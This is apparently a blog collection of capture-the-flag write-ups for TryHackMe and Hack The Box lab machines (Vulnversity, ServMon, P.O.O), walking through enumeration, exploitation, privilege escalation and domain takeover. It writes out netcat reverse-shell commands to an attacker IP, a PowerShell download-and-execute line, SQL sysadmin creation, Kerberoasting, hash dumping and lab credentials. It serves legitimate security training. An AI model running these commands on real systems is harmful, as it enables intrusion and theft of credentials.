#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

#3 Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

Author : Puckiestyle

thm-vulnversity-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s vulnversity at https://tryhackme.com/room/vulnversity

Vulnversity

Enumeration

In the room there is a lot of useful information about nmap, so I’m going to run my scan and skip the explaining part.

A lot of open ports.

  • 21 | FTP (vsftpd 3.0.3)
  • 22 | SSH (OpenSSH 7.2p2 ~ Ubuntu version)
  • 139 | Samba (smbd 3.x – 4.x)
  • 445 | Samba (smbd 4.3.11)
  • 3128 | HTTP Proxy (Squid proxy 3.5.12)
  • 3333 | HTTP webserver (Apache 2.4.18)

First 2 services need credentials and the vsftpd version is not the one with the backdoor (too bad LoL). So let’s start with some low hanging fruit.

Webserver

The room gives information about the use of GoBuster. This is an excellent tool to enumerate a webserver, but personally I prefer DirSearch.

When scanning don’t forget to specify the port number, because most tools will try and scan the default port.

Several folders are found, /internal/ is the one we’re after.

The page shows a upload folder which I tested with an jpg file from the internet. No go. Did the same with other popular files like gif, png and of course php. All were rejected. There is a compilation of very useful wordlists called SecLists. Nowadays it’s part of the default lists of Kali, but if your Kali or a different OS doesn’t have it, it can be found here. To fuzz the webpage I’m going to use BurpSuite. It got a nice feature called intruder which can do the job for me in an automated fashion.

First I upload a file (doesn’t really matter which file) and capture the request with your BurpSuite proxy. After you captured it, send it to the intruder and clear all positions. After that only mark the extension and don’t forget to include the dot (.). Or else you will have two dots in the input.

Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be “file%2ephp”, which won’t work. After this you can start the attack.

Every entry results in a HTTP code 200, which makes sense as your get a valid response from the server, just not the one you look for. So how can you tell which one is different? By the length of the response. It will be different from the others as it won’t have the error message.

Now we know which extension will pass. Time to upload a file which contains a payload for a reverse shell. A good one to use is from pentestmonkey. The only thing to change after you download it, is the IP address and the port which it needs to connect to.

You can find your current IP address by typing the command ip a

Escalation of Privilege

After we upload the file, we start a listener.

Find the uploaded file.

And click on the file.

And we’re in. Our next move is to see if we have access to the user his home folder.

Yes we have.

The file user.txt is world readable, so that one is done. Now for the escalation of privilege. For a lot of CTF based challenges a good find are files with the SUID bit set.

An explanation of this command I gave a writeup earlier ago, but in short I searched for all files with the SUID bit set (perm 4000) and looked who the owner is. Because of the SUID bit, I can execute the program with the rights of the owner. The file that stands out is a file which is created recently (also a good indication).

/bin/systemctl

Systemctl is a controlling interface and inspection tool for the widely-adopted init system and service manager systemd. Systemd in turn is an init system and system manager that is widely becoming the new standard for Linux machines. So what can we do with systemctl?

Systemd initializes user space components that run after the Linux kernel has booted, as well as continuously maintaining those components throughout a system’s lifecycle. These tasks are known as units, and each unit has a corresponding unit file. We can create our own unit file and let systemd start it. Normally systemctl will look for unit files in the default folder, which is /etc/system/systemd. But we don’t have the permission to write to that folder. So how can we create an unit file and let systemctl start it? We use an enviroment variable.

First we create a variable which holds a unique file.

Then we create an unit file and write it into the variable.

Inside the unit file we entered a command which will let shell execute the command cat and redirect the output of cat to a file called output in the folder tmp. And finally we use the /bin/systemctl program to enable the unit file.

Let’s see if it worked….

There is a file called output.

And there you have it. The output of root.txt

htb-servmon-nl

htb-servmon

As always we start with a nmap scan

 

We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

LFI is https://www.exploit-db.com/exploits/47774

.

so we have the passwords

L1k3B1gBut7s@W0rk is the pasword for user Nadine for service

 

ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk

next we upload nc.exe to box

then
https://www.exploit-db.com/exploits/46802

C:\Program Files\NSClient++>nscp web — password –display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat –data-binary “c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe”

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Other way:

Enumerate the current user and find that the “Server Operators” user group can read and write system services, and can change services with System permissions and start. Here comes the idea: find a system permission service that has not been started, modify the content to Trojan or nc, and then execute:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>

Author : Puckiestyle

htb-endgame-poo

Hack the Box – P.O.O ( writeup as of box retired by june 2020 )

As normal I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

It seems we have discovered a few ports open. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones for me to look at seemed to be the ‘admin’ folder and ‘.DS_Store’ file. Simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder that it resides in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using https://github.com/lijiejie/ds_store_exp

python ds_store_exp.py http://10.13.38.11/.DS_Store

We have some interesting directories. I run IIS Shortname scanner located at https://github.com/irsdl/IIS-ShortName-Scanner to see if I could come up with anything interesting and one specific directory came up with good information.

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.


This seemed to be details to a SQL database. And we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag Select * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}

Creating an sql user puckie  in sql studio

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

 

SHELL Access
I needed to enable xp_cmdshell


Now that I had sysadmin rights on the box, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
python3 mssql_shell.py from https://github.com/puckiestyle/python/blob/master/mssql_shell.py

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.


After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page


Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


POO{4882bd2ccfd4b5318978540d9843729f}

IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name=”Block network access for R local user accounts in SQL Server instance POO_PUBLIC”


And then I noticed an IPv6 address and another adapter.


I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-winrm to find the 4th flag

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}

I wanted to see what I could find out about the domain. Knowing that it is on a domain, I was hoping for some Kerberos tokens that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier..

Kerberoasting
I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This come back with 2 accounts.

This one was named p00_hr.

This one was named p00_adm.


I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

Hashcat
I proceeded to run these 2 tokens through hashcat and run them with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.
p00_hr:Password123!

However, when I run the p00_adm account through rockyou, it did not return any results. I then decided to run the token through all passwords found in all text files that lay within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r

Now that I had both these passwords cracked. I needed to try and gain access to the domain controller which was on 172.20.128.53.

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1


Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account names mr3ks


PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1
c:\temp\sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText 
$Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList 
$Username,$pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the root folder

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx


I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now for me to create my tunnel with reGeorge.

python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx


I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with Direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type;
dism /online /enable-feature /featurename:NerFx4Extended-ASPNET45 -All

…..extra…

kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

SQL>

.

msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user...
[+] 10.13.38.11:1433 - Connected.
[*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY
[*] 10.13.38.11:1433 - Domain Name: POO
[+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.13.38.11:1433 - - POO\Administrator
[*] 10.13.38.11:1433 - - POO\Guest
[*] 10.13.38.11:1433 - - POO\krbtgt
[*] 10.13.38.11:1433 - - POO\DefaultAccount
[*] 10.13.38.11:1433 - - POO\Domain Admins
[*] 10.13.38.11:1433 - - POO\Domain Users
[*] 10.13.38.11:1433 - - POO\Domain Guests
[*] 10.13.38.11:1433 - - POO\Domain Computers
[*] 10.13.38.11:1433 - - POO\Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cert Publishers
[*] 10.13.38.11:1433 - - POO\Schema Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Admins
[*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners
[*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers
[*] 10.13.38.11:1433 - - POO\Protected Users
[*] 10.13.38.11:1433 - - POO\Key Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Key Admins
[*] 10.13.38.11:1433 - - POO\RAS and IAS Servers
[*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\mr3ks
[*] 10.13.38.11:1433 - - POO\DC$
[*] 10.13.38.11:1433 - - POO\DnsAdmins
[*] 10.13.38.11:1433 - - POO\DnsUpdateProxy
[*] 10.13.38.11:1433 - - POO\COMPATIBILITY$
[*] 10.13.38.11:1433 - - POO\p00_hr
[*] 10.13.38.11:1433 - - POO\p00_dev
[*] 10.13.38.11:1433 - - POO\p00_adm
[*] 10.13.38.11:1433 - - POO\P00 Help Desk
[+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed


msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11
rhosts => 10.13.38.11
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Running MS SQL Server Enumeration...
[*] 10.13.38.11:1433 - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.13.38.11:1433 - Configuration Parameters:
[*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled
[*] 10.13.38.11:1433 - xp_cmdshell is Enabled
[*] 10.13.38.11:1433 - remote access is Enabled
[*] 10.13.38.11:1433 - allow updates is Not Enabled
[*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled
[*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled
[*] 10.13.38.11:1433 - Databases on the server:
[*] 10.13.38.11:1433 - Database name:master
[*] 10.13.38.11:1433 - Database Files for master:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] 10.13.38.11:1433 - Database name:tempdb
[*] 10.13.38.11:1433 - Database Files for tempdb:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] 10.13.38.11:1433 - Database name:POO_PUBLIC
[*] 10.13.38.11:1433 - Database Files for POO_PUBLIC:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] 10.13.38.11:1433 - System Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - Disabled Accounts:
[*] 10.13.38.11:1433 - No Disabled Logins Found
[*] 10.13.38.11:1433 - No Accounts Policy is set for:
[*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 10.13.38.11:1433 - Password Expiration is not checked for:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - System Admin Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - Windows Logins on this Server:
[*] 10.13.38.11:1433 - No Windows logins found!
[*] 10.13.38.11:1433 - Windows Groups that can logins on this Server:
[*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system.
[*] 10.13.38.11:1433 - Accounts with Username and Password being the same:
[*] 10.13.38.11:1433 - No Account with its password being the same as its username was found.
[*] 10.13.38.11:1433 - Accounts with empty password:
[*] 10.13.38.11:1433 - No Accounts with empty passwords where found.
[*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found:
[*] 10.13.38.11:1433 - sp_replsetsyncstatus
[*] 10.13.38.11:1433 - sp_replcounters
[*] 10.13.38.11:1433 - sp_replsendtoqueue
[*] 10.13.38.11:1433 - sp_resyncexecutesql
[*] 10.13.38.11:1433 - sp_prepexecrpc
[*] 10.13.38.11:1433 - sp_repltrans
[*] 10.13.38.11:1433 - sp_xml_preparedocument
[*] 10.13.38.11:1433 - xp_qv
[*] 10.13.38.11:1433 - xp_getnetname
[*] 10.13.38.11:1433 - sp_releaseschemalock
[*] 10.13.38.11:1433 - sp_refreshview
[*] 10.13.38.11:1433 - sp_replcmds
[*] 10.13.38.11:1433 - sp_unprepare
[*] 10.13.38.11:1433 - sp_resyncprepare
[*] 10.13.38.11:1433 - sp_createorphan
[*] 10.13.38.11:1433 - xp_dirtree
[*] 10.13.38.11:1433 - sp_replwritetovarbin
[*] 10.13.38.11:1433 - sp_replsetoriginator
[*] 10.13.38.11:1433 - sp_xml_removedocument
[*] 10.13.38.11:1433 - sp_repldone
[*] 10.13.38.11:1433 - sp_reset_connection
[*] 10.13.38.11:1433 - xp_fileexist
